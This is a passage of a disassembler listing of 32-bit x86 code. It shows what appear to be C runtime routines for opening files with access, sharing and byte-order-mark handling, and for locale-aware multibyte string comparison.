		lea	eax, [ebp+var_14]
		push	eax
		call	sub_410E49
		test	eax, eax
		pop	ecx
		jz	short loc_40E689
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4033CB
		add	esp, 14h

loc_40E689:				; CODE XREF: sub_40E632+48j
		lea	eax, [ebp+var_18]
		push	eax
		call	sub_407EC6
		test	eax, eax
		pop	ecx
		jz	short loc_40E6A4
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4033CB
		add	esp, 14h

loc_40E6A4:				; CODE XREF: sub_40E632+63j
		mov	eax, 8000h
		test	[ebp+arg_8], eax
		jnz	short loc_40E6C0
		test	[ebp+arg_8], 74000h
		jnz	short loc_40E6BC
		cmp	[ebp+var_14], eax
		jz	short loc_40E6C0

loc_40E6BC:				; CODE XREF: sub_40E632+83j
		or	[ebp+var_1], 80h

loc_40E6C0:				; CODE XREF: sub_40E632+7Aj
					; sub_40E632+88j
		mov	eax, [ebp+arg_8]
		push	3
		pop	edx
		and	eax, edx
		sub	eax, ebx
		mov	ecx, 80000000h
		jz	short loc_40E70F
		dec	eax
		jz	short loc_40E706
		dec	eax
		jz	short loc_40E6FD

loc_40E6D7:				; CODE XREF: sub_40E632+F6j
					; sub_40E632+14Fj ...
		call	sub_405DA6
		mov	[eax], ebx
		or	dword ptr [esi], 0FFFFFFFFh
		call	sub_405D93
		push	16h
		pop	esi
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], esi
		call	sub_4034C7
		add	esp, 14h
		jmp	loc_40EB8C
; ---------------------------------------------------------------------------

loc_40E6FD:				; CODE XREF: sub_40E632+A3j
		mov	[ebp+var_C], 0C0000000h
		jmp	short loc_40E712
; ---------------------------------------------------------------------------

loc_40E706:				; CODE XREF: sub_40E632+A0j
		mov	[ebp+var_C], 40000000h
		jmp	short loc_40E712
; ---------------------------------------------------------------------------

loc_40E70F:				; CODE XREF: sub_40E632+9Dj
		mov	[ebp+var_C], ecx

loc_40E712:				; CODE XREF: sub_40E632+D2j
					; sub_40E632+DBj
		mov	eax, [ebp+arg_C]
		sub	eax, edi
		jz	short loc_40E74E
		sub	eax, edi
		jz	short loc_40E745
		sub	eax, edi
		jz	short loc_40E73C
		sub	eax, edi
		jz	short loc_40E737
		sub	eax, 40h
		jnz	short loc_40E6D7
		xor	eax, eax
		cmp	[ebp+var_C], ecx
		setz	al
		mov	[ebp+var_8], eax
		jmp	short loc_40E751
; ---------------------------------------------------------------------------

loc_40E737:				; CODE XREF: sub_40E632+F1j
		mov	[ebp+var_8], edx
		jmp	short loc_40E751
; ---------------------------------------------------------------------------

loc_40E73C:				; CODE XREF: sub_40E632+EDj
		mov	[ebp+var_8], 2
		jmp	short loc_40E751
; ---------------------------------------------------------------------------

loc_40E745:				; CODE XREF: sub_40E632+E9j
		mov	[ebp+var_8], 1
		jmp	short loc_40E751
; ---------------------------------------------------------------------------

loc_40E74E:				; CODE XREF: sub_40E632+E5j
		mov	[ebp+var_8], ebx

loc_40E751:				; CODE XREF: sub_40E632+103j
					; sub_40E632+108j ...
		mov	eax, [ebp+arg_8]
		mov	edx, 700h
		and	eax, edx
		mov	ecx, 400h
		cmp	eax, ecx
		jg	short loc_40E7A2
		jz	short loc_40E799
		cmp	eax, ebx
		jz	short loc_40E799
		cmp	eax, 100h
		jz	short loc_40E790
		cmp	eax, 200h
		jz	loc_40E814
		cmp	eax, 300h
		jnz	loc_40E6D7
		mov	[ebp+var_10], 2
		jmp	short loc_40E7BF
; ---------------------------------------------------------------------------

loc_40E790:				; CODE XREF: sub_40E632+13Dj
		mov	[ebp+var_10], 4
		jmp	short loc_40E7BF
; ---------------------------------------------------------------------------

loc_40E799:				; CODE XREF: sub_40E632+132j
					; sub_40E632+136j
		mov	[ebp+var_10], 3
		jmp	short loc_40E7BF
; ---------------------------------------------------------------------------

loc_40E7A2:				; CODE XREF: sub_40E632+130j
		cmp	eax, 500h
		jz	short loc_40E7B8
		cmp	eax, 600h
		jz	short loc_40E814
		cmp	eax, edx
		jnz	loc_40E6D7

loc_40E7B8:				; CODE XREF: sub_40E632+175j
		mov	[ebp+var_10], 1

loc_40E7BF:				; CODE XREF: sub_40E632+15Cj
					; sub_40E632+165j ...
		mov	ecx, [ebp+arg_8]
		mov	eax, 100h
		test	ecx, eax
		mov	edi, 80h
		jz	short loc_40E7E2
		mov	edx, dword_428A94
		not	edx
		and	edx, [ebp+arg_10]
		test	dl, dl
		js	short loc_40E7E2
		xor	edi, edi
		inc	edi

loc_40E7E2:				; CODE XREF: sub_40E632+19Cj
					; sub_40E632+1ABj
		test	cl, 40h
		jz	short loc_40E7FE
		or	[ebp+var_C], 10000h
		or	edi, 4000000h
		cmp	[ebp+var_18], 2
		jnz	short loc_40E7FE
		or	[ebp+var_8], 4

loc_40E7FE:				; CODE XREF: sub_40E632+1B3j
					; sub_40E632+1C6j
		test	cx, 1000h
		jz	short loc_40E807
		or	edi, eax

loc_40E807:				; CODE XREF: sub_40E632+1D1j
		test	cl, 20h
		jz	short loc_40E81D
		or	edi, 8000000h
		jmp	short loc_40E828
; ---------------------------------------------------------------------------

loc_40E814:				; CODE XREF: sub_40E632+144j
					; sub_40E632+17Cj
		mov	[ebp+var_10], 5
		jmp	short loc_40E7BF
; ---------------------------------------------------------------------------

loc_40E81D:				; CODE XREF: sub_40E632+1D8j
		test	cl, 10h
		jz	short loc_40E828
		or	edi, 10000000h

loc_40E828:				; CODE XREF: sub_40E632+1E0j
					; sub_40E632+1EEj
		call	sub_40F470
		cmp	eax, 0FFFFFFFFh
		mov	[esi], eax
		jnz	short loc_40E84B
		call	sub_405DA6
		mov	[eax], ebx
		or	dword ptr [esi], 0FFFFFFFFh
		call	sub_405D93
		mov	dword ptr [eax], 18h
		jmp	short loc_40E89B
; ---------------------------------------------------------------------------

loc_40E84B:				; CODE XREF: sub_40E632+200j
		mov	eax, [ebp+arg_0]
		push	ebx
		push	edi
		push	[ebp+var_10]
		mov	dword ptr [eax], 1
		lea	eax, [ebp+var_28]
		push	eax
		push	[ebp+var_8]
		push	[ebp+var_C]
		push	[ebp+arg_4]
		call	ds:off_41E06C
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jnz	short loc_40E8A7
		mov	esi, [esi]
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		mov	eax, dword_437EC0[eax*4]
		lea	eax, [eax+esi+4]
		and	byte ptr [eax],	0FEh

loc_40E88E:				; CODE XREF: sub_40E632+2A2j
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		push	eax
		call	sub_405DB9

loc_40E89A:				; CODE XREF: sub_40E632+345j
		pop	ecx

loc_40E89B:				; CODE XREF: sub_40E632+217j
		call	sub_405D93
		mov	eax, [eax]
		jmp	loc_40EC6B
; ---------------------------------------------------------------------------

loc_40E8A7:				; CODE XREF: sub_40E632+23Fj
		push	edi
		call	ds:dword_41E144	; GetFileType
		cmp	eax, ebx
		jnz	short loc_40E8D6
		mov	esi, [esi]
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		mov	eax, dword_437EC0[eax*4]
		lea	eax, [eax+esi+4]
		and	byte ptr [eax],	0FEh
		push	edi
		call	ds:off_41E0D8
		jmp	short loc_40E88E
; ---------------------------------------------------------------------------

loc_40E8D6:				; CODE XREF: sub_40E632+27Ej
		cmp	eax, 2
		jnz	short loc_40E8E1
		or	[ebp+var_1], 40h
		jmp	short loc_40E8EA
; ---------------------------------------------------------------------------

loc_40E8E1:				; CODE XREF: sub_40E632+2A7j
		cmp	eax, 3
		jnz	short loc_40E8EA
		or	[ebp+var_1], 8

loc_40E8EA:				; CODE XREF: sub_40E632+2ADj
					; sub_40E632+2B2j
		push	edi
		push	dword ptr [esi]
		call	sub_40F23F
		mov	eax, [esi]
		mov	edx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	edx, 5
		mov	edx, dword_437EC0[edx*4]
		pop	ecx
		pop	ecx
		mov	cl, [ebp+var_1]
		or	cl, 1
		mov	[edx+eax+4], cl
		mov	eax, [esi]
		mov	edx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	edx, 5
		mov	edx, dword_437EC0[edx*4]
		lea	eax, [edx+eax+24h]
		and	byte ptr [eax],	80h
		mov	[ebp+var_3], cl
		and	[ebp+var_3], 48h
		mov	[ebp+var_1], cl
		jnz	loc_40E9BD
		test	cl, 80h
		jz	loc_40EBF7
		test	byte ptr [ebp+arg_8], 2
		jz	short loc_40E9BD
		push	2
		or	edi, 0FFFFFFFFh
		push	edi
		push	dword ptr [esi]
		call	sub_410D1B
		add	esp, 0Ch
		cmp	eax, edi
		mov	[ebp+var_8], eax
		jnz	short loc_40E97C
		call	sub_405DA6
		cmp	dword ptr [eax], 83h
		jz	short loc_40E9BD

loc_40E970:				; CODE XREF: sub_40E632+379j
					; sub_40E632+389j ...
		push	dword ptr [esi]
		call	sub_40900D
		jmp	loc_40E89A
; ---------------------------------------------------------------------------

loc_40E97C:				; CODE XREF: sub_40E632+32Fj
		push	1
		lea	eax, [ebp+var_4]
		push	eax
		push	dword ptr [esi]
		mov	[ebp+var_4], bl
		call	sub_40A36D
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_40E9AD
		cmp	[ebp+var_4], 1Ah
		jnz	short loc_40E9AD
		mov	eax, [ebp+var_8]
		cdq
		push	edx
		push	eax
		push	dword ptr [esi]
		call	sub_410B67
		add	esp, 0Ch
		cmp	eax, edi
		jz	short loc_40E970

loc_40E9AD:				; CODE XREF: sub_40E632+35Fj
					; sub_40E632+365j
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_410D1B
		add	esp, 0Ch
		cmp	eax, edi
		jz	short loc_40E970

loc_40E9BD:				; CODE XREF: sub_40E632+305j
					; sub_40E632+318j ...
		test	[ebp+var_1], 80h
		jz	loc_40EBF7
		mov	ecx, 74000h
		test	[ebp+arg_8], ecx
		mov	edi, 4000h
		jnz	short loc_40E9E5
		mov	eax, [ebp+var_14]
		and	eax, ecx
		jnz	short loc_40E9E2
		or	[ebp+arg_8], edi
		jmp	short loc_40E9E5
; ---------------------------------------------------------------------------

loc_40E9E2:				; CODE XREF: sub_40E632+3A9j
		or	[ebp+arg_8], eax

loc_40E9E5:				; CODE XREF: sub_40E632+3A2j
					; sub_40E632+3AEj
		mov	eax, [ebp+arg_8]
		and	eax, ecx
		cmp	eax, edi
		jz	short loc_40EA32
		cmp	eax, 10000h
		jz	short loc_40EA1E
		cmp	eax, 14000h
		jz	short loc_40EA1E
		cmp	eax, 20000h
		jz	short loc_40EA2C
		cmp	eax, 24000h
		jz	short loc_40EA2C
		cmp	eax, 40000h
		jz	short loc_40EA18
		cmp	eax, 44000h
		jnz	short loc_40EA35

loc_40EA18:				; CODE XREF: sub_40E632+3DDj
		mov	[ebp+var_2], 1
		jmp	short loc_40EA35
; ---------------------------------------------------------------------------

loc_40EA1E:				; CODE XREF: sub_40E632+3C1j
					; sub_40E632+3C8j
		mov	ecx, [ebp+arg_8]
		mov	eax, 301h
		and	ecx, eax
		cmp	ecx, eax
		jnz	short loc_40EA35

loc_40EA2C:				; CODE XREF: sub_40E632+3CFj
					; sub_40E632+3D6j
		mov	[ebp+var_2], 2
		jmp	short loc_40EA35
; ---------------------------------------------------------------------------

loc_40EA32:				; CODE XREF: sub_40E632+3BAj
		mov	[ebp+var_2], bl

loc_40EA35:				; CODE XREF: sub_40E632+3E4j
					; sub_40E632+3EAj ...
		test	[ebp+arg_8], 70000h
		jz	loc_40EBF7
		test	[ebp+var_1], 40h
		mov	[ebp+var_8], ebx
		jnz	loc_40EBF7
		mov	eax, [ebp+var_C]
		mov	ecx, 0C0000000h
		and	eax, ecx
		cmp	eax, 40000000h
		jz	loc_40EB1B
		cmp	eax, 80000000h
		jz	short loc_40EAE2
		cmp	eax, ecx
		jnz	loc_40EBF7
		mov	eax, [ebp+var_10]
		cmp	eax, ebx
		jbe	loc_40EBF7
		cmp	eax, 2
		jbe	short loc_40EA91
		cmp	eax, 4
		jbe	short loc_40EAB8

loc_40EA88:				; CODE XREF: sub_40E632+500j
		cmp	eax, 5
		jnz	loc_40EBF7

loc_40EA91:				; CODE XREF: sub_40E632+44Fj
					; sub_40E632+496j ...
		movsx	eax, [ebp+var_2]
		xor	edi, edi
		dec	eax
		jz	loc_40EBC4
		dec	eax
		jnz	loc_40EBF7
		mov	[ebp+var_8], 0FEFFh
		mov	[ebp+var_10], 2
		jmp	loc_40EBD2
; ---------------------------------------------------------------------------

loc_40EAB8:				; CODE XREF: sub_40E632+454j
		push	2
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_40D27E
		add	esp, 10h
		or	eax, edx
		jz	short loc_40EA91
		push	ebx
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_40D27E
		and	eax, edx
		add	esp, 10h
		cmp	eax, 0FFFFFFFFh
		jz	loc_40E970

loc_40EAE2:				; CODE XREF: sub_40E632+437j
		push	3
		lea	eax, [ebp+var_8]
		push	eax
		push	dword ptr [esi]
		call	sub_40A36D
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	loc_40E970
		cmp	eax, 2
		jz	short loc_40EB6B
		cmp	eax, 3
		jnz	loc_40EBB6
		cmp	[ebp+var_8], 0BFBBEFh
		jnz	short loc_40EB6B
		mov	[ebp+var_2], 1
		jmp	loc_40EBF7
; ---------------------------------------------------------------------------

loc_40EB1B:				; CODE XREF: sub_40E632+42Cj
		mov	eax, [ebp+var_10]
		cmp	eax, ebx
		jbe	loc_40EBF7
		cmp	eax, 2
		jbe	loc_40EA91
		cmp	eax, 4
		ja	loc_40EA88
		push	2
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_40D27E
		add	esp, 10h
		or	eax, edx
		jz	loc_40EA91
		push	ebx
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_40D27E
		add	esp, 10h
		and	eax, edx

loc_40EB5D:				; CODE XREF: sub_40E632+590j
		cmp	eax, 0FFFFFFFFh
		jnz	loc_40EBF7
		jmp	loc_40E970
; ---------------------------------------------------------------------------

loc_40EB6B:				; CODE XREF: sub_40E632+4CCj
					; sub_40E632+4DEj
		mov	eax, [ebp+var_8]
		and	eax, 0FFFFh
		cmp	eax, 0FFFEh
		jnz	short loc_40EB93
		push	dword ptr [esi]
		call	sub_40900D
		pop	ecx
		call	sub_405D93
		push	16h
		pop	esi
		mov	[eax], esi

loc_40EB8C:				; CODE XREF: sub_40E632+C6j
		mov	eax, esi
		jmp	loc_40EC6B
; ---------------------------------------------------------------------------

loc_40EB93:				; CODE XREF: sub_40E632+546j
		cmp	eax, 0FEFFh
		jnz	short loc_40EBB6
		push	ebx
		push	2
		push	dword ptr [esi]
		call	sub_410D1B
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	loc_40E970
		mov	[ebp+var_2], 2
		jmp	short loc_40EBF7
; ---------------------------------------------------------------------------

loc_40EBB6:				; CODE XREF: sub_40E632+4D1j
					; sub_40E632+566j
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_410D1B
		add	esp, 0Ch
		jmp	short loc_40EB5D
; ---------------------------------------------------------------------------

loc_40EBC4:				; CODE XREF: sub_40E632+466j
		mov	[ebp+var_8], 0BFBBEFh
		mov	[ebp+var_10], 3

loc_40EBD2:				; CODE XREF: sub_40E632+481j
					; sub_40E632+5C3j
		mov	eax, [ebp+var_10]
		sub	eax, edi
		push	eax
		lea	eax, [ebp+edi+var_8]
		push	eax
		push	dword ptr [esi]
		call	sub_40D9E0
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	loc_40E970
		add	edi, eax
		cmp	[ebp+var_10], edi
		jg	short loc_40EBD2

loc_40EBF7:				; CODE XREF: sub_40E632+30Ej
					; sub_40E632+38Fj ...
		mov	eax, [esi]
		mov	ecx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	ecx, 5
		mov	ecx, dword_437EC0[ecx*4]
		lea	eax, [ecx+eax+24h]
		mov	cl, [eax]
		xor	cl, [ebp+var_2]
		and	cl, 7Fh
		xor	[eax], cl
		mov	eax, [esi]
		mov	ecx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	ecx, 5
		mov	ecx, dword_437EC0[ecx*4]
		lea	eax, [ecx+eax+24h]
		mov	ecx, [ebp+arg_8]
		mov	dl, [eax]
		shr	ecx, 10h
		shl	cl, 7
		and	dl, 7Fh
		or	cl, dl
		cmp	[ebp+var_3], bl
		mov	[eax], cl
		jnz	short loc_40EC69
		test	byte ptr [ebp+arg_8], 8
		jz	short loc_40EC69
		mov	esi, [esi]
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		mov	eax, dword_437EC0[eax*4]
		lea	eax, [eax+esi+4]
		or	byte ptr [eax],	20h

loc_40EC69:				; CODE XREF: sub_40E632+614j
					; sub_40E632+61Aj
		mov	eax, ebx

loc_40EC6B:				; CODE XREF: sub_40E632+270j
					; sub_40E632+55Cj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_40E632	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40EC70	proc near		; CODE XREF: sub_40ED3C+14p

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	14h
		push	offset dword_422DB0
		call	__SEH_prolog4
		xor	esi, esi
		mov	[ebp+var_1C], esi
		xor	eax, eax
		mov	edi, [ebp+arg_10]
		cmp	edi, esi
		setnz	al
		cmp	eax, esi
		jnz	short loc_40ECAA

loc_40EC8F:				; CODE XREF: sub_40EC70+47j
					; sub_40EC70+5Bj
		call	sub_405D93
		push	16h
		pop	edi
		mov	[eax], edi
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4034C7
		add	esp, 14h
		mov	eax, edi
		jmp	short loc_40ED03
; ---------------------------------------------------------------------------

loc_40ECAA:				; CODE XREF: sub_40EC70+1Dj
		or	dword ptr [edi], 0FFFFFFFFh
		xor	eax, eax
		cmp	[ebp+arg_0], esi
		setnz	al
		cmp	eax, esi
		jz	short loc_40EC8F
		cmp	[ebp+arg_14], esi
		jz	short loc_40ECCD
		mov	eax, [ebp+arg_C]
		and	eax, 0FFFFFE7Fh
		neg	eax
		sbb	eax, eax
		inc	eax
		jz	short loc_40EC8F

loc_40ECCD:				; CODE XREF: sub_40EC70+4Cj
		mov	[ebp+ms_exc.disabled], esi
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		lea	eax, [ebp+var_1C]
		push	eax
		mov	eax, edi
		call	sub_40E632
		add	esp, 14h
		mov	[ebp+var_20], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40ED0E
		mov	eax, [ebp+var_20]
		cmp	eax, esi
		jz	short loc_40ED03
		or	dword ptr [edi], 0FFFFFFFFh

loc_40ED03:				; CODE XREF: sub_40EC70+38j
					; sub_40EC70+8Ej
		call	__SEH_epilog4
		retn
sub_40EC70	endp


; =============== S U B	R O U T	I N E =======================================



sub_40ED09	proc near		; DATA XREF: zcrshv4o:00422DC8o
		xor	esi, esi
		mov	edi, [ebp+18h]
sub_40ED09	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40ED0E	proc near		; CODE XREF: sub_40EC70+84p
		cmp	[ebp-1Ch], esi
		jz	short locret_40ED3B
		cmp	[ebp-20h], esi
		jz	short loc_40ED33
		mov	eax, [edi]
		mov	ecx, eax
		sar	ecx, 5
		and	eax, 1Fh
		imul	eax, 28h
		mov	ecx, dword_437EC0[ecx*4]
		lea	eax, [ecx+eax+4]
		and	byte ptr [eax],	0FEh

loc_40ED33:				; CODE XREF: sub_40ED0E+8j
		push	dword ptr [edi]
		call	sub_40F44E
		pop	ecx

locret_40ED3B:				; CODE XREF: sub_40ED0E+3j
		retn
sub_40ED0E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40ED3C	proc near		; CODE XREF: sub_4087BF+26Dp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		push	1
		push	[ebp+arg_0]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		call	sub_40EC70
		add	esp, 18h
		pop	ebp
		retn
sub_40ED3C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40ED5A	proc near		; CODE XREF: sub_40EF74+Ap

var_14		= byte ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= byte ptr -8
var_4		= byte ptr -4
var_3		= byte ptr -3
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 14h
		push	esi
		push	[ebp+arg_8]
		lea	ecx, [ebp+var_14]
		call	sub_402CAD
		mov	edx, [ebp+arg_0]
		xor	esi, esi
		cmp	edx, esi
		jnz	short loc_40EDA4
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_8], 0
		jz	short loc_40ED9A
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40ED9A:				; CODE XREF: sub_40ED5A+37j
		mov	eax, 7FFFFFFFh
		jmp	loc_40EF71
; ---------------------------------------------------------------------------

loc_40EDA4:				; CODE XREF: sub_40ED5A+19j
		push	ebx
		mov	ebx, [ebp+arg_4]
		cmp	ebx, esi
		jnz	short loc_40EDDB
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_8], 0
		jz	short loc_40EDD1
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40EDD1:				; CODE XREF: sub_40ED5A+6Ej
		mov	eax, 7FFFFFFFh
		jmp	loc_40EF70
; ---------------------------------------------------------------------------

loc_40EDDB:				; CODE XREF: sub_40ED5A+50j
		mov	eax, [ebp+var_10]
		cmp	[eax+8], esi
		jnz	short loc_40EE07
		lea	eax, [ebp+var_14]
		push	eax
		push	ebx
		push	edx
		call	sub_402D64
		add	esp, 0Ch
		cmp	[ebp+var_8], 0
		jz	loc_40EF70
		mov	ecx, [ebp+var_C]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	loc_40EF70
; ---------------------------------------------------------------------------

loc_40EE07:				; CODE XREF: sub_40ED5A+87j
		push	edi
		mov	edi, 200h

loc_40EE0D:				; CODE XREF: sub_40ED5A+1CDj
		movzx	cx, byte ptr [edx]
		movzx	ecx, cx
		movzx	esi, cl
		inc	edx
		test	byte ptr [esi+eax+1Dh],	4
		mov	[ebp+arg_0], edx
		jz	short loc_40EE7B
		cmp	byte ptr [edx],	0
		jnz	short loc_40EE2B
		xor	esi, esi
		jmp	short loc_40EE97
; ---------------------------------------------------------------------------

loc_40EE2B:				; CODE XREF: sub_40ED5A+CBj
		push	1
		push	dword ptr [eax+4]
		lea	ecx, [ebp+var_4]
		push	2
		push	ecx
		push	2
		dec	edx
		push	edx
		push	edi
		push	dword ptr [eax+0Ch]
		lea	eax, [ebp+var_14]
		push	eax
		call	sub_40C8B9
		add	esp, 24h
		cmp	eax, 1
		jnz	short loc_40EE56
		movzx	ax, [ebp+var_4]
		jmp	short loc_40EE70
; ---------------------------------------------------------------------------

loc_40EE56:				; CODE XREF: sub_40ED5A+F3j
		cmp	eax, 2
		jnz	loc_40EF2C
		movzx	ax, [ebp+var_4]
		movzx	cx, [ebp+var_3]
		shl	ax, 8
		add	ax, cx

loc_40EE70:				; CODE XREF: sub_40ED5A+FAj
		inc	[ebp+arg_0]
		movzx	esi, ax
		mov	eax, [ebp+var_10]
		jmp	short loc_40EE97
; ---------------------------------------------------------------------------

loc_40EE7B:				; CODE XREF: sub_40ED5A+C6j
		movzx	edx, cx
		lea	ecx, [edx+eax]
		test	byte ptr [ecx+1Dh], 10h
		jz	short loc_40EE94
		movzx	cx, byte ptr [ecx+11Dh]
		movzx	esi, cx
		jmp	short loc_40EE97
; ---------------------------------------------------------------------------

loc_40EE94:				; CODE XREF: sub_40ED5A+12Bj
		movzx	esi, dx

loc_40EE97:				; CODE XREF: sub_40ED5A+CFj
					; sub_40ED5A+11Fj ...
		movzx	cx, byte ptr [ebx]
		movzx	ecx, cx
		movzx	edx, cl
		inc	ebx
		test	byte ptr [edx+eax+1Dh],	4
		jz	short loc_40EEFE
		cmp	byte ptr [ebx],	0
		jnz	short loc_40EEB2
		xor	ecx, ecx
		jmp	short loc_40EF1A
; ---------------------------------------------------------------------------

loc_40EEB2:				; CODE XREF: sub_40ED5A+152j
		push	1
		push	dword ptr [eax+4]
		lea	ecx, [ebp+var_4]
		push	2
		push	ecx
		push	2
		lea	ecx, [ebx-1]
		push	ecx
		push	edi
		push	dword ptr [eax+0Ch]
		lea	eax, [ebp+var_14]
		push	eax
		call	sub_40C8B9
		add	esp, 24h
		cmp	eax, 1
		jnz	short loc_40EEDF
		movzx	ax, [ebp+var_4]
		jmp	short loc_40EEF5
; ---------------------------------------------------------------------------

loc_40EEDF:				; CODE XREF: sub_40ED5A+17Cj
		cmp	eax, 2
		jnz	short loc_40EF2C
		movzx	ax, [ebp+var_4]
		movzx	cx, [ebp+var_3]
		shl	ax, 8
		add	ax, cx

loc_40EEF5:				; CODE XREF: sub_40ED5A+183j
		movzx	ecx, ax
		mov	eax, [ebp+var_10]
		inc	ebx
		jmp	short loc_40EF1A
; ---------------------------------------------------------------------------

loc_40EEFE:				; CODE XREF: sub_40ED5A+14Dj
		movzx	edx, cx
		lea	ecx, [edx+eax]
		test	byte ptr [ecx+1Dh], 10h
		jz	short loc_40EF17
		movzx	cx, byte ptr [ecx+11Dh]
		movzx	ecx, cx
		jmp	short loc_40EF1A
; ---------------------------------------------------------------------------

loc_40EF17:				; CODE XREF: sub_40ED5A+1AEj
		movzx	ecx, dx

loc_40EF1A:				; CODE XREF: sub_40ED5A+156j
					; sub_40ED5A+1A2j ...
		cmp	cx, si
		jnz	short loc_40EF4B
		test	si, si
		jz	short loc_40EF60
		mov	edx, [ebp+arg_0]
		jmp	loc_40EE0D
; ---------------------------------------------------------------------------

loc_40EF2C:				; CODE XREF: sub_40ED5A+FFj
					; sub_40ED5A+188j
		call	sub_405D93
		mov	dword ptr [eax], 16h
		cmp	[ebp+var_8], 0
		jz	short loc_40EF44
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40EF44:				; CODE XREF: sub_40ED5A+1E1j
		mov	eax, 7FFFFFFFh
		jmp	short loc_40EF6F
; ---------------------------------------------------------------------------

loc_40EF4B:				; CODE XREF: sub_40ED5A+1C3j
		sbb	eax, eax
		and	eax, 2
		dec	eax
		cmp	[ebp+var_8], 0
		jz	short loc_40EF6F
		mov	ecx, [ebp+var_C]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	short loc_40EF6F
; ---------------------------------------------------------------------------

loc_40EF60:				; CODE XREF: sub_40ED5A+1C8j
		cmp	[ebp+var_8], 0
		jz	short loc_40EF6D
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40EF6D:				; CODE XREF: sub_40ED5A+20Aj
		xor	eax, eax

loc_40EF6F:				; CODE XREF: sub_40ED5A+1EFj
					; sub_40ED5A+1FBj ...
		pop	edi

loc_40EF70:				; CODE XREF: sub_40ED5A+7Cj
					; sub_40ED5A+9Bj ...
		pop	ebx

loc_40EF71:				; CODE XREF: sub_40ED5A+45j
		pop	esi
		leave
		retn
sub_40ED5A	endp


; =============== S U B	R O U T	I N E =======================================



sub_40EF74	proc near		; CODE XREF: sub_4087BF+1E6p
					; sub_4087BF+203p ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	0
		push	[esp+4+arg_4]
		push	[esp+8+arg_0]
		call	sub_40ED5A
		add	esp, 0Ch
		retn
sub_40EF74	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40EF87	proc near		; CODE XREF: sub_40F0F0+Ep

var_10		= byte ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		xor	ebx, ebx
		cmp	[ebp+arg_8], ebx
		jnz	short loc_40EF9C
		xor	eax, eax
		jmp	loc_40F0D9
; ---------------------------------------------------------------------------

loc_40EF9C:				; CODE XREF: sub_40EF87+Cj
		push	edi
		push	[ebp+arg_C]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		mov	edi, [ebp+var_C]
		cmp	[edi+8], ebx
		jnz	short loc_40EFD6
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40CEB9
		add	esp, 0Ch
		cmp	[ebp+var_4], bl
		jz	loc_40F0D8
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
